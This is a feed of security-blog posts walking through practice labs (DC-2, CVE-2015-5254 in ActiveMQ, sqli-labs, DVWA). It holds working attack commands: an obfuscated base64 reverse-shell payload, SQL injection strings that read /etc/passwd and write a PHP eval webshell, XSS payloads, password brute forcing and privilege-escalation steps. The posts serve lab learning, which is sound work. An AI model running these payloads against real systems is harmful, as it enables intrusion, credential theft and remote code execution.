<content type="html"><![CDATA[<h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>Nothing to do today, so I am back on target machines. I should do less of this; I plan to finish the DC series and then study in more depth, and it is time to go through master eviden's fofa tutorial</p><p>Local IP: 192.168.56.135<br>Target IP: 192.168.56.147</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="Information gathering"></a>Information gathering</h2><p>Scan the local network with nmap; host discovery with -sP is used to find hosts on the internal network</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282257172.png"><br>Port scan<br>nmap -A -p- 192.168.56.147<br>A detailed full-port scan of the target IP finds two services, on ports 80 and 7744: http and ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282301709.png"></p></blockquote><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="Penetration testing"></a>Penetration testing</h2><h3 id="修改hosts"><a href="#修改hosts" class="headerlink" title="Editing hosts"></a>Editing hosts</h3><p>Visiting the web site, we find a redirect to a domain name, so we need to edit the hosts file and point that domain at the target IP<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282305798.png"></p><blockquote><p>vim /etc/hosts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282308689.png"><br>Visiting again takes us to the main page, where we find a flag telling us to brute-force accounts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282309300.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282311344.png"></p></blockquote><h3 id="wpscan爆破账户"><a href="#wpscan爆破账户" class="headerlink" title="Brute-forcing accounts with wpscan"></a>Brute-forcing accounts with wpscan</h3><p>After reaching the site, fingerprint it with whatweb or Wappalyzer; it turns out to be built on WordPress</p><blockquote><p>whatweb 192.168.56.147<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282312143.png"><br>Run a directory scan to look for the admin page; the backend admin page is found<br>dirb <a href="http://dc-2/">http://dc-2/</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282314018.png"><br>There seems to be a dedicated WordPress tool, wpscan; scan with it. Common invocations:<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> scan the version<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate t scan themes<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate p scan plugins<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate u enumerate users</p></blockquote><p>The version scan shows 4.7.10; then enumerate users with wpscan<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282322816.png"><br>Three users are found: admin, jerry, tom<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282324996.png"><br>Following flag1, use cewl to generate a wordlist and brute-force with it</p><blockquote><p>cewl <a href="http://dc-2/">http://dc-2/</a> &gt; 1.txt generate the wordlist<br>CeWL (Custom Word List Generator) is an application written in Ruby that crawls the content of a given URL and, according to the parameters and options the user sets, generates a custom wordlist file. These wordlists can be used in password guessing, brute-force and similar attack scenarios, improving the success rate of a penetration test</p></blockquote><blockquote><p>wpscan --url <a href="http://dc-2/">http://dc-2</a> --passwords 1.txt brute-force the passwords; jerry's and tom's passwords are found</p></blockquote><p>jerry/adipiscing<br>tom/parturient</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282328174.png"></p><p>Log in as jerry; flag2 is found, hinting that we should log in via ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330516.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330233.png"></p><h3 id="ssh登录"><a href="#ssh登录" class="headerlink" title="ssh login"></a>ssh login</h3><blockquote><p>ssh <a href="mailto:tom@192.168.56.147">tom@192.168.56.147</a> -p 7744<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282333534.png"><br>Login succeeds; flag3 is found locally, but only vi is available, and the flag tells us to escalate privileges<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282335807.png"></p></blockquote><h3 id="rbash提权"><a href="#rbash提权" class="headerlink" title="rbash privilege escalation"></a>rbash privilege escalation</h3><p>Check which programs are available with the current privileges</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282337342.png"></p><p>Bypass rbash with echo</p><blockquote><p>Obtaining the jerry user's privileges<br>export -p //view the environment variables<br>BASH_CMDS[a]=/bin/sh;a //assign /bin/sh to a<br>/bin/bash<br>export PATH=$PATH:/bin/ //add to PATH<br>export PATH=$PATH:/usr/bin //add to PATH</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282345295.png"></p><p>Look for commands that run with root privileges</p><blockquote><p>find / -user root -perm -4000 -print 2&gt;/dev/null</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282354377.png"></p><blockquote><p>su jerry use su to obtain jerry's privileges; the password works now<br>We can now read jerry's flag4, which hints at escalating via git</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282341436.png"></p><blockquote><p>sudo -l shows that git can be used</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282351395.png"></p><blockquote><p>sudo git help status</p></blockquote><p>View git's help; on the command line of the page that opens, enter<br>!/bin/sh to escalate privileges<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282357480.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282359962.png"></p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>That completes it. The knowledge points include the use of wpscan, privilege escalation via git, and bypassing rbash</p>]]></content>
<summary type="html"><h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>Nothing to do today, so I am back on target machines. I should do less of this; I plan to finish the DC series and then study in more depth, and it is time to go through master eviden's fofa tutorial</p>
</summary>
<category term="Penetration Testing" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>CVE-2015-5254</title>
<link href="https://fogpost.top/2024/11/27/CVE-2015-5254/"/>
<id>https://fogpost.top/2024/11/27/CVE-2015-5254/</id>
<published>2024-11-27T09:57:58.000Z</published>
<updated>2024-11-27T11:24:08.322Z</updated>
<content type="html"><![CDATA[<h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>This is my first write-up of this kind. Let's play with this CVE, starting with the old ones; it is a deserialization vulnerability<br>The default account and password are admin/admin</p><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="Vulnerability description"></a>Vulnerability description</h2><p>Vulnerability ID: CVE-2015-5254<br>Affected versions: Apache ActiveMQ 5.x before 5.13.0, <a href="https://www.cvedetails.com/cve/CVE-2015-5254/">https://www.cvedetails.com/cve/CVE-2015-5254/</a><br>Cause: the program does not restrict the classes that can be serialized in the broker. A remote attacker can exploit this to execute arbitrary code via a specially crafted serialized Java Message Service (JMS) ObjectMessage object.</p><p>vulnP: 110.41.22.24:8186<br>This is my own server; the port should be closed by now, as I close it when I am done. If you want to play, tell me and I will open it; it is just a docker container, so there is nothing to gain from wrecking it<br>hackIP: 172.20.205.57</p><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="Reproducing the vulnerability"></a>Reproducing the vulnerability</h2><p>This vulnerability involves two ports: 61616 is the working port for message passing, and 8161 is the admin page</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271814424.png"><br>Visiting the page directly shows an Apache ActiveMQ CMS framework. Since this is a reproduction we know its version exactly; if the version were unknown, one could trigger errors by entering random paths, or use Yunxi fingerprinting to detect the version.</p><blockquote><p>whatweb <a href="http://110.41.22.24:8161/">http://110.41.22.24:8161/</a> shows the version</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271821474.png"><br><a href="https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar">jmet</a></p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 110.41.22.24 61616<br>Note that the Java version must be 8 or lower</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271853828.png"><br>This creates an event queue in the admin interface; view the message<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271859064.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411271900112.png"><br>Clicking any message triggers it, and the command touch /tmp/success has been executed<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271907776.png"></p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaT4vZGV2L3RjcC8xOTIuMTY4LjE4LjI0NC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 110.41.22.24 61616</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271911825.png"></p><p>After this runs, the administrator receives a new message; clicking it sends back our shell<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271909000.png"><br>One thing I noticed: nc can only listen on local interfaces, so this reverse shell is a bit problematic. Since I am not good at handling the IP translation there may be issues, and the reverse shell also had problems; I will see whether I can try again later on my local network</p><h2 id="总结"><a href="#总结" class="headerlink" title="Summary"></a>Summary</h2><p>This CVE requires luring the administrator into clicking and also attacking from inside the internal network, which makes it rather weak, but the attack method is relatively simple and easy to reproduce. The hard part is writing the exploit; at some point I should look at the contents of this jar</p>]]></content>
<summary type="html"><h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>This is my first write-up of this kind. Let's play with this CVE, starting with the old ones</p></summary>
<category term="CVE" scheme="https://fogpost.top/categories/CVE/"/>
<category term="target" scheme="https://fogpost.top/tags/target/"/>
</entry>
<entry>
<title>web杂项</title>
<link href="https://fogpost.top/2024/11/27/web%E6%9D%82%E9%A1%B9/"/>
<id>https://fogpost.top/2024/11/27/web%E6%9D%82%E9%A1%B9/</id>
<published>2024-11-27T09:06:48.000Z</published>
<updated>2024-11-27T09:25:35.229Z</updated>
<content type="html"><![CDATA[<h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="Search tips"></a>Search tips</h1><ul><li>site:<a href="http://www.hao123/">www.hao123</a>. <ul><li>Returns all content of this target site that has been crawled and indexed by the search engine<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271724499.png"></li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> keyword<ul><li>Returns all indexed pages of the target site that contain this keyword</li><li>Here the keyword can be set to terms such as site backend, admin backend, password change, password recovery, and so on</li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> inurl:admin.php<ul><li>Returns all pages of the target site whose address contains admin.php; admin.php, manage.php or other keywords can be used to find key functional pages</li></ul></li><li>link:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>Returns all pages that link to the target site, including its developers' personal blogs, development logs, the third-party company that built the site, partners, and so on</li></ul></li><li>related:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>Returns all pages "similar" to the target site, which may include information about common software and the like</li></ul></li><li>intitle:"500 Internal Server Error" "server at"<ul><li>Searches for error pages</li></ul></li><li>inurl:"nph-proxy.cgi" "Start browsing"<ul><li>Searches for proxy servers</li></ul></li></ul>]]></content>
<summary type="html"><h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="Search tips"></a>Search tips</h1><ul><li>site:<a href="http://www.hao123/">www.hao123</a>.</li></ul></summary>
<category term="Network" scheme="https://fogpost.top/categories/%E7%BD%91%E7%BB%9C/"/>
<category term="web" scheme="https://fogpost.top/tags/web/"/>
</entry>
<entry>
<title>sqli1-10练习</title>
<link href="https://fogpost.top/2024/11/24/sqli%E7%BB%83%E4%B9%A0/"/>
<id>https://fogpost.top/2024/11/24/sqli%E7%BB%83%E4%B9%A0/</id>
<published>2024-11-24T09:12:33.000Z</published>
<updated>2025-01-11T02:40:26.604Z</updated>
<content type="html"><![CDATA[<h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli introduction"></a>sqli introduction</h1><p>SQL injection can be understood as constructing malicious input so that the program executes the code we want it to. We therefore need to know what the SQL statements and the filtering in the source code look like, but in a black box we cannot see the code, which means we need enough accumulated knowledge. So I plan to finish this whole practice range; I want to become a master of SQL 🥰!</p><h1 id="前置知识点"><a href="#前置知识点" class="headerlink" title="Prerequisites"></a>Prerequisites</h1><p>Characteristics of UNION queries:<br>1. The combined queries must return the same number of columns!<br>2. The type and order of each column in the combined queries should ideally match<br>3. The union keyword removes duplicates by default; union all keeps duplicate rows</p><p>version(): the database version<br>database(): the database in use<br>user(): the current user<br>limit: the limit clause fetches all the data in batches<br>group_concat(): fetches all the database information at once</p><p>information_schema.tables: contains all tables in the database<br>table_name: table name<br>table_schema: database name<br>column_name: column name</p><p>--dbs: lists all databases<br>--tables: lists all tables<br>--columns: lists all column names in a table<br>--dump: dumps the data of a given table</p><h1 id="联合注入"><a href="#联合注入" class="headerlink" title="UNION injection"></a>UNION injection</h1><h2 id="手工注入"><a href="#手工注入" class="headerlink" title="Manual injection"></a>Manual injection</h2><ol><li>First enter 1 and the page returns normally; enter ?id=1' and it returns an error, indicating single-quote injection<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060247359.png"></li><li>Enter ?id=1' and '1'='1 and the page displays normally<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060248949.png"></li><li>Construct ?id=1' and '1'='1' order by 1--+ and the page displays normally<br>?id=1' and '1'='1' order by 2--+ displays normally<br>?id=1' and '1'='1' order by 3--+ displays normally<br>?id=1' and '1'='1' order by 4--+ produces an error page<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060250107.png"><br>So we learn that the table has only three columns; the column count is determined</li><li>Construct the UNION query ?id=-1' union select 1,2,3--+; id=-1 makes the original statement match nothing, and the UNION shows which columns are echoed: 2 and 3 are<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060254643.png"></li><li>Construct ?id=-1' union select 1,database(),version()--+ and the database name and version are echoed<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060256922.png"></li><li>Construct ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ and the table names in the database are echoed<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060259924.png"></li><li>Query the column names of users: ?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060302469.png"></li><li>Query the contents of the users table: -1' union select 1,2,group_concat(0x5c,username,0x5c,password) from users --+ 0x5c is the hex for a backslash, used to join the data of the two columns<br>This is the basis of manual injection; most injection techniques are refinements of the above</li></ol><h2 id="sqlmap注入"><a href="#sqlmap注入" class="headerlink" title="sqlmap injection"></a>sqlmap injection</h2><p>sqlmap -u <a href="http://sql/sqli-labs-master/Less-1/id=1">http://sql/sqli-labs-master/Less-1/id=1</a> --dbs lists the databases<br>I will write a dedicated sqlmap tutorial later, so I won't say more here</p><h1 id="bool盲注"><a href="#bool盲注" class="headerlink" title="Boolean blind injection"></a>Boolean blind injection</h1><p>?id=1'and length((select database()))>9--+<br># The greater-than sign can be replaced with less-than or equals; this determines the length of the database name. length() returns the length of the current database name; if the database is haha, length() is 4<br>?id=1'and ascii(substr((select database()),1,1))=115--+<br># substr("78909",1,1)=7; in substr(a,b,c), a is the string to cut, b the start position and c the length. In boolean blind injection we always use length 1 because we test characters one at a time. ascii() converts the extracted character to its ASCII code, so we can pin down a number and map it back to the character.</p><p>?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+<br>Determine the total length of the table names.<br>?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+<br>Determine the table names character by character</p><p>?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+<br>Determine the total length of the column names<br>?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+<br>Determine the column names character by character.</p><p>?id=1' and length((select group_concat(username,password) from users))>109--+<br>Determine the length of the column contents<br>?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+<br>Check the contents character by character.</p><h2 id="双查询注入"><a href="#双查询注入" class="headerlink" title="Double-query injection"></a>Double-query injection</h2><p><a href="https://blog.csdn.net/xiayun1995/article/details/86512290">Reference</a><br>Having understood the basic principle of boolean blind injection, we notice a problem: manual injection inevitably takes too long. Hence double-query injection, which spares us the long, tedious work and retrieves the database information directly. Before explaining it, we first need to understand a few functions</p><h3 id="函数"><a href="#函数" class="headerlink" title="Functions"></a>Functions</h3><p>rand(): random number function, returns a number between 0 and 1<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241656811.png"><br>floor(): rounds down; floor's rounding gives us integers, and combined with multiplication we can build any random integer selection<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241658373.png"><br>concat(): string concatenation, used to join the data we query<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241701358.png"><br>group by: grouping; as (alias): gives the query result an alias (the part in parentheses is the custom alias)<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241707695.png"><br>count(): aggregate function<br>Here count(*) counts the rows returned by the preceding part. Because of group by and the random number, duplicate keys can occur; when a key is duplicated an error is triggered and reported, and since the subquery has already completed before the error occurs, the subquery's content is displayed along with the error message<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241709101.png"><br>What we need here is the first error, because in practice we cannot query the correct message; there is only a return value when an error is encountered</p><h3 id="子查询"><a href="#子查询" class="headerlink" title="Subqueries"></a>Subqueries</h3><p>Subquery: an inner query, which allows another query to be nested inside the current query</p><blockquote><p>MariaDB [dvwa]&gt; SELECT concat("test: ",(select database())) as a;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241654803.png"><br>The operation first runs (select database()), then concatenates the result with "test: ", and finally returns the result.</p></blockquote><p>During injection we do not know the database or table names; we can use the information_schema database to find them: information_schema.schemata contains all of MySQL's database names, information_schema.tables contains all table names, and information_schema.columns contains all column names<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241703198.png"></p><h3 id="报错注入模板"><a href="#报错注入模板" class="headerlink" title="Error-based injection templates"></a>Error-based injection templates</h3><ul><li>select 1/0</li><li>select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a</li><li>extractvalue(1, concat(0x5c,(select user())))</li><li>updatexml(0x3a,concat(1,(select user())),1)</li><li>exp(~(SELECT * from(select user())a))</li><li>ST_LatFromGeoHash((select * from(select * from(select user())a)b))</li><li>GTID_SUBSET(version(), 1)</li></ul><h1 id="时间盲注"><a href="#时间盲注" class="headerlink" title="Time-based blind injection"></a>Time-based blind injection</h1><p>?id=1' and if(1=1,sleep(5),1)--+<br>Test the parameter construction.<br>?id=1'and if(length((select database()))>9,sleep(5),1)--+<br>Determine the database name length</p><p>?id=1'and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+<br>Determine the database name character by character<br>?id=1'and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)--+<br>Determine the total length of the table names</p><p>?id=1'and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)--+<br>Determine the table names character by character<br>?id=1'and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20,sleep(5),1)--+<br>Determine the total length of the column names</p><p>?id=1'and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99,sleep(5),1)--+<br>Determine the column names character by character.<br>?id=1' and if(length((select group_concat(username,password) from users))>109,sleep(5),1)--+<br>Determine the length of the column contents</p><p>?id=1' and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)--+<br>Check the contents character by character.</p><h1 id="通过sql来getshell"><a href="#通过sql来getshell" class="headerlink" title="Getting a shell via SQL"></a>Getting a shell via SQL</h1><h2 id="条件和原理"><a href="#条件和原理" class="headerlink" title="Conditions and principle"></a>Conditions and principle</h2><blockquote><p>Conditions:<br> root privileges<br> knowing the absolute path of the web root<br> secure_file_priv empty or set to a directory (the @@secure_file_priv parameter shows its value)<br> gpc disabled<br>Principle:<br> write a webshell, execute system commands through its parameter, and delete the webshell when done<br>Appendix: SQL Server getshell conditions and principle<br> Conditions:<br> outbound connections allowed<br> sa privileges<br> Principle:<br> enable the xp_cmdshell extension to execute system commands</p></blockquote><h2 id="读写文件"><a href="#读写文件" class="headerlink" title="Reading and writing files"></a>Reading and writing files</h2><blockquote><p>?id=-1)))))) union select load_file('/etc/passwd'),2%23</p></blockquote><h2 id="读取nginx配置文件,寻找网站根目录"><a href="#读取nginx配置文件,寻找网站根目录" class="headerlink" title="Reading the nginx config file to find the web root"></a>Reading the nginx config file to find the web root</h2><blockquote><p>?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23</p></blockquote>
<pre><code class="language-php">Array
(
    [0] => Array
        (
            [username] => daemon off;

worker_processes auto;

error_log /var/log/nginx/error.log warn;

events {
    worker_connections 1024;
}

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;
    sendfile on;
    keepalive_timeout 65;

    server {
        listen 80;
        server_name localhost;
        root /var/www/html;
        index index.php;

        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

        location / {
            try_files $uri $uri/ /index.php?$args;
        }

        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }
    }
}
            [password] => 2
        )

)
</code></pre><h2 id="写入php探针"><a href="#写入php探针" class="headerlink" title="Writing a PHP probe"></a>Writing a PHP probe</h2><blockquote><p>?id=-1)))))) union select '&lt;?php phpinfo();?&gt;',2 into outfile '/var/www/html/info.php'%23<br><a href="http://node6.anna.nssctf.cn:28413/info.php">http://node6.anna.nssctf.cn:28413/info.php</a></p></blockquote><h2 id="写入webshell"><a href="#写入webshell" class="headerlink" title="Writing a webshell"></a>Writing a webshell</h2><blockquote><p>?id=-1)))))) union select '&lt;?php eval($_POST["cc"]);?&gt;',2 into outfile '/var/www/html/cc.php'%23<br>Connect with AntSword: <a href="http://node6.anna.nssctf.cn:28413/cc.php">http://node6.anna.nssctf.cn:28413/cc.php</a> password cc</p></blockquote>]]></content>
<summary type="html"><h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli introduction"></a>sqli introduction</h1><p>SQL injection can be understood as constructing malicious input so that the program executes the code we want it to.</p></summary>
<category term="SQL" scheme="https://fogpost.top/categories/SQL/"/>
<category term="sql" scheme="https://fogpost.top/tags/sql/"/>
</entry>
<entry>
<title>dvwa全解</title>
<link href="https://fogpost.top/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/"/>
<id>https://fogpost.top/2024/11/23/dvwa%E5%85%A8%E8%A7%A3/</id>
<published>2024-11-23T04:35:02.000Z</published>
<updated>2024-11-26T11:14:52.795Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>When it comes to target machines, the classic DVWA cannot be missed. It is a target very well suited to beginners: it bundles many kinds of vulnerabilities and lets you choose the difficulty freely. If you want to play, just set it up yourself; I set mine up on a server to play with</p><h2 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h2><h3 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h3><p>Entering anything gives this response, meaning the password is wrong<br><img src="https://gitee.com/fogpost/photo/raw/master/202411231240412.png"><br>Capture the request with a proxy tool and send it to the repeater. Yakit's brute-forcing uses file tags; the principle is the same as Burp's: it needs a wordlist, and uses the response size to tell success from failure<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261753518.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261806101.png"></p><h3 id="command-injection"><a href="#command-injection" class="headerlink" title="command injection"></a>command injection</h3><p>Appending a command directly after the IP in the lookup executes it; scary. cat works too<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261810028.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261811659.png"></p><h3 id="CSRF"><a href="#CSRF" class="headerlink" title="CSRF"></a>CSRF</h3><p>Capture the original password-change request, tweak it slightly in yakit and replay it to change the password; modifying part of the URL and replaying also succeeds<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261817959.png"><br><img src="https://gitee.com/fogpost/photo/raw/master/202411261818130.png"><br>One trick in this process is turning the long link into a short one, which can be done with webmaster tools, so that the victim does not notice it during social engineering<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261824846.png"><br>A page can also be constructed for it</p><h3 id="XSS-DOM"><a href="#XSS-DOM" class="headerlink" title="XSS(DOM)"></a>XSS(DOM)</h3><p>Looking at the page source there is no PHP code, only JS, so we can use a JS script<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914977.png"><br>Clicking English reveals a plaintext URL; we can make use of this English parameter</p><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=English">http://110.41.22.24/vulnerabilities/xss_d/?default=English</a></p></blockquote><blockquote><p><a href="http://110.41.22.24/vulnerabilities/xss_d/?default=%5C">http://110.41.22.24/vulnerabilities/xss_d/?default=\</a>&lt;script&gt;alert('xss')&lt;/script&gt;</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411261906137.png"></p><h3 id="XSS-Reflected"><a href="#XSS-Reflected" class="headerlink" title="XSS(Reflected)"></a>XSS(Reflected)</h3><p>Reflected XSS; looking at the source it is the same as above, except that this time the reflection is in the input box<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261914096.png"></p><blockquote><p>&lt;script&gt;alert('xss')&lt;/script&gt;</p></blockquote><p>Grabbing the cookie</p><blockquote><p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411261911735.png"></p></blockquote>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>When it comes to target machines, the classic DVWA cannot be missed. It is a target very well suited to beginners: it bundles many kinds of vulnerabilities and lets you choose the difficulty freely.</p></summary>
<category term="Penetration Testing" scheme="https://fogpost.top/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/"/>
<category term="dvwa" scheme="https://fogpost.top/tags/dvwa/"/>
</entry>
<entry>
<title>vulhub搭建</title>
<link href="https://fogpost.top/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/"/>
<id>https://fogpost.top/2024/11/21/vulhub%E6%90%AD%E5%BB%BA/</id>
<published>2024-11-21T11:22:56.000Z</published>
<updated>2024-11-21T12:09:19.570Z</updated>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>This concerns some classic vulnerabilities and practice environments. It is great when a ready-made one can be downloaded, but when we have to reproduce and build the environment ourselves many bugs appear, so a good tool is needed to build practice environments conveniently. That tool is vulhub, a docker-based collection of vulnerable environments that lets us stand up a vulnerable environment quickly. Its author is p牛 (phith0n), also known as 离别歌; go and have a look at his blog</p><h1 id="安装"><a href="#安装" class="headerlink" title="Installation"></a>Installation</h1><p>vulhub is a docker-based tool platform; install docker and docker-compose yourself</p><h2 id="下载Vulhub"><a href="#下载Vulhub" class="headerlink" title="Downloading Vulhub"></a>Downloading Vulhub</h2><p>Create any folder, fetch the environments from GitHub, then enter the vulhub directory</p><blockquote><p>git clone <a href="https://github.com/vulhub/vulhub.git">https://github.com/vulhub/vulhub.git</a><br>cd vulhub</p></blockquote><p>Enter any directory, for example shiro, ls and cd into the CVE folder you want, and start docker-compose<br>to create the environment. Pay attention to the memory allocation and, for some vulnerabilities, to version issues among the various tools<br><img src="https://gitee.com/fogpost/photo/raw/master/202411211945375.png"></p><p>Setting it up is pretty simple</p>]]></content>
<summary type="html"><h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>This concerns some classic vulnerabilities and practice environments. It is great when a ready-made one can be downloaded, but when we have to reproduce and build the environment ourselves many bugs appear, so a good tool is needed</p></summary>
<category term="Tools" scheme="https://fogpost.top/categories/%E5%B7%A5%E5%85%B7/"/>
<category term="tool" scheme="https://fogpost.top/tags/tool/"/>
</entry>
</feed>